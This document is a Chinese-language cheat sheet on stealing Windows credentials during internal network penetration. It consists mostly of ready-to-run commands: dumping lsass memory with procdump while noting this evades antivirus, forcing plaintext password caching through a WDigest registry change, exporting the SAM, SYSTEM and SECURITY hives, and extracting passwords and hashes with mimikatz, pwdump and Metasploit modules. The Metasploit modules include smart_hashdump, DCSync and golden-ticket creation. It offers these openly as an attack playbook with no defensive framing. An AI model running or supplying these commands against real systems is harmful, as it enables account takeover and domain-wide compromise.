内网渗透Windows密码凭证获取

记录一下抓取window凭证信息的一些工具
Windows凭证抓取

1，procdump (官方工具无视免杀)（首选）
procdump + mimikatz 加载dmp文件，并导出其中的明文密码(procdump过杀软)

管理员运行工具，导出为lsass.dump文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp 　　#32位系统
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统

将lsass.dmp放在mimikatz同一目录，读取密码文件
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

2，注册表读取windows hash (首选)
当目标为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，但可以通过修改注册表的方式抓取明文。

cmd修改注册表命令：
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

注册表读取密码主要获取的是3个文件

导出文件
reg save HKLM\SYSTEM Sys.hiv
reg save HKLM\SAM Sam.hiv
reg save hklm\security security.hive
通过mimikatz读取管理员密码的hash值
mimikatz.exe "lsadump::sam /sam:Sam.hiv /system:Sys.hiv " exit> hiv.txt
mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive /security:security.hive " exit> hash.txt

3，Pwdump

下载地址
https://www.openwall.com/passwords/windows-pwdump
管理员运行cmd，命令执行pwdump7.exe

4，mimikatz(名声最大的密码获取工具)

项目地址：https://github.com/gentilkiwi/mimikatz/

需要管理员权限
sekurlsa模块

提取权限
privilege::debug  

抓取用户明文密码
sekurlsa::logonpasswords

抓取用户NTLM哈希
sekurlsa::msv

5，MSF
MSF框架密码抓取

抓取自动登录的密码
很多用户习惯将计算机设置自动登录，可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。

meterpreter > run windows/gather/credentials/windows_autologin

hashdump导出密码哈希
hashdump模块可以从SAM数据库中导出本地用户账号，该命令的使用需要系统权限。

meterpreter > run hashdump

run windows/gather/smart_hashdump命令导出希哈值
run windows/gather/smart_hashdump命令的使用需要系统权限。
该功能更强大，如果当前用户是域管理员用户，则可以导出域内所有用户的hash

meterpreter > run windows/gather/smart_hashdump

kiwi模块明文密码导出
mimikatz模块已经合并为kiwi模块；使用kiwi模块需要system权限，
所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
kiwi模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。
所以如果目标系统是64位的，则必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载kiwi并且查看系统明文。如果目标系统是32位的，则没有这个限制。

进程迁移

查看当前系统信息，可以看出目标系统是多少位的
sysinfo #查看当前系统信息
查看进程信息
ps  #查看进程
migrate PID

kiwi模块使用

load kiwi				#加载模块
help kiwi
creds_all：             #列举所有凭据
creds_kerberos：        #列举所有kerberos凭据
creds_msv：             #列举所有msv凭据
creds_ssp：             #列举所有ssp凭据
creds_tspkg：           #列举所有tspkg凭据
creds_wdigest：         #列举所有wdigest凭据
dcsync：                #通过DCSync检索用户帐户信息
dcsync_ntlm：           #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create：  #创建黄金票据
kerberos_ticket_list：  #列举kerberos票据
kerberos_ticket_purge： #清除kerberos票据
kerberos_ticket_use：   #使用kerberos票据
kiwi_cmd：              #执行mimikatz的命令，后面接mimikatz.exe的命令
lsa_dump_sam：          #dump出lsa的SAM
lsa_dump_secrets：      #dump出lsa的密文
password_change：       #修改密码
wifi_list：             #列出当前用户的wifi配置文件
wifi_list_shared：      #列出共享wifi配置文件/编码

kiwi_cmd 模块可以让我们使用mimikatz的全部功能，该命令后面接 mimikatz.exe 的命令:
kiwi_cmd sekurlsa::logonpasswords

6，CS
CS和MSF命令差不多